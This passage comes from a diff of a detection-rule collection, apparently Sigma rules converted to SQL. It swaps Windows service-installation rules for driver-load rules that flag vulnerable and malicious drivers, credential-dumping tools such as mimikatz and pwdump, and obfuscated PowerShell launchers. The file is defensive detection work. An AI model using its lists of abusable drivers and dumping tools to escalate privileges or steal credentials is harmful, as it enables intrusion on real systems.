'%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8'))" ], - "filename": "win_system_mal_creddumper.yml" + "filename": "driver_load_win_vuln_hw_driver.yml" }, { - "title": "Zerologon Exploitation Using Well-known Tools", - "id": "18f37338-b9bd-4117-a039-280c81f7a596", - "status": "stable", - "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", - "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", + "title": "Suspicious Driver Load from Temp", + "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", + "status": "test", + "description": "Detects a driver load from a temporary directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1210", - "attack.lateral_movement" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], - "level": "critical", + "falsepositives": [ + "There is a relevant set of false positives depending on applications in the environment" + ], + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\'" ], - "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + "filename": "driver_load_win_susp_temp_use.yml" }, { - "title": "New Service Uses Double Ampersand in Path", - "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "title": "Vulnerable Dell BIOS Update Driver Load", + "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", "status": "experimental", - "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543", + "attack.t1068" ], "falsepositives": [ - "Unknown" + "Legitimate BIOS driver updates (should be rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244'))" ], - "filename": "win_system_service_install_susp_double_ampersand.yml" + "filename": "driver_load_win_vuln_dell_driver.yml" }, { - "title": "Service Installed By Unusual Client - System", - "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", - "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "title": "PowerShell Scripts Run by a Services", + "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "status": "test", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\')" ], - "filename": "win_system_system_service_installation_by_unusal_client.yml" + "filename": "driver_load_win_powershell_script_installed_as_service.yml" }, { - "title": "Anydesk Remote Access Software Service Installation", - "id": "530a6faa-ff3d-4022-b315-50828e77eef5", + "title": "Usage Of Malicious POORTRY Signed Driver", + "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", "status": "experimental", - "description": "Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.", + "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.privilege_escalation", + "attack.t1543", + "attack.t1068" ], "falsepositives": [ - "Legitimate usage of the anydesk tool" + "Legitimate BIOS driver updates (should be rare)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'AnyDesk Service')" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a'))" ], - "filename": "win_system_service_install_anydesk.yml" + "filename": "driver_load_win_mal_poortry_driver.yml" }, { - "title": "Remote Access Tool Services Have Been Installed - System", - "id": "1a31b18a-f00c-4061-9900-f735b96c99fc", - "status": "experimental", - "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", - "author": "Connor Martin, Nasreddine Bencherchali", + "title": "Credential Dumping Tools Service Execution", + "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "status": "test", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.persistence", - "attack.t1543.003", - "attack.t1569.002" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036') AND (ServiceName LIKE '%SSUService%' ESCAPE '\\' OR ServiceName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceName LIKE '%Atera%' ESCAPE '\\' OR ServiceName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceName LIKE '%RPCService%' ESCAPE '\\' OR ServiceName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceName LIKE '%monblanking%' ESCAPE '\\' OR ServiceName LIKE '%RManService%' ESCAPE '\\' OR ServiceName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceName LIKE '%vncserver%' ESCAPE '\\' OR ServiceName LIKE '%Parsec%' ESCAPE '\\' OR ServiceName LIKE '%chromoting%' ESCAPE '\\' OR ServiceName LIKE '%Zoho%' ESCAPE '\\' OR ServiceName LIKE '%jumpcloud%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\')" ], - "filename": "win_system_service_install_remote_access_software.yml" + "filename": "driver_load_win_mal_creddumper.yml" }, { - "title": "New PDQDeploy Service - Server Side", - "id": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", + "title": "Vulnerable WinRing0 Driver Load", + "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", "status": "experimental", - "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", "attack.t1543.003" ], "falsepositives": [ - "Legitimate use of the tool" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployService.exe%' ESCAPE '\\' OR ServiceName IN ('PDQDeploy', 'PDQ Deploy')))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7')" ], - "filename": "win_system_service_install_pdqdeploy.yml" + "filename": "driver_load_win_vuln_winring0_driver.yml" }, { - "title": "PsExec Service Installation", - "id": "42c575ea-e41e-41f1-b248-8093c3e82a28", + "title": "Vulnerable GIGABYTE Driver Load", + "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", "status": "experimental", - "description": "Detects PsExec service installation and execution events (service and Sysmon)", - "author": "Thomas Patzke", + "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'PSEXESVC' AND ImagePath LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\') OR (EventID = '7036' AND ServiceName = 'PSEXESVC')))" + "SELECT * FROM logs WHERE ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b'))" ], - "filename": "win_system_service_install_psexec.yml" + "filename": "driver_load_win_vuln_gigabyte_driver.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - System", - "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "title": "Vulnerable Driver Load By Name", + "id": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects the load of known vulnerable drivers via their names only.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ - "Unknown" + "False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", + "If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\mtcbsv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_def64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gameink.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\81.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_rcio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sense5ext.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gvcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86-withoutdbg.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atillk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lurker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\segwindrvx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\enetechio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inpoutx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows8-10-32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\corsairllaccess64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winflash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\paniox64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\blackbonedrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msio32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fiddrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutildrv2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\my.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wyproxy64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ni.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_i2cio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\protects.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proxy32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netproxydriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_hwmio64\\_w10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\physmem.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrsmartconnectdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\monitor\\_win10\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amdryzenmasterdriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandra.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmix64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_i2c64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_rcio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zam64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncpl.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nchgbios2x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bwrsh.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lha.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntbios.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\blacklotus\\_driver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ucorew64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwos2ec7x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows7-32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv106.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elbycdio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asupio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\otipcibus.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows-xp-64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswarpot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amdpowerprofiler.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tgsafe.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntiolib\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrrapidstartdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwos2ec10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viraglt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lv561av.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nscm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\c.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asribdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\b1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eneio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\80.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iobitunlocker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zamguard64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nstrwsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wiseunlo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_hwmio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hostnt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\glckio2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hpportiox64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\citmdrv\\_amd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kevp64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmixp64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nbiolib\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\full.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflash.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtcore64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\speedfan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwrwdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msrhook.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proxy64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hw\\_sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bandai.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\piddrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t8.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adv64drv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrsetupdrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bwrs.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fiddrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\goad.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gametersafe.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lenovodiagnosticsdriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netflt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bw.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntbios\\_2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutil.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dh\\_kernel.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow8x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\superbmc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nodedriver.sys' ESCAPE '\\' 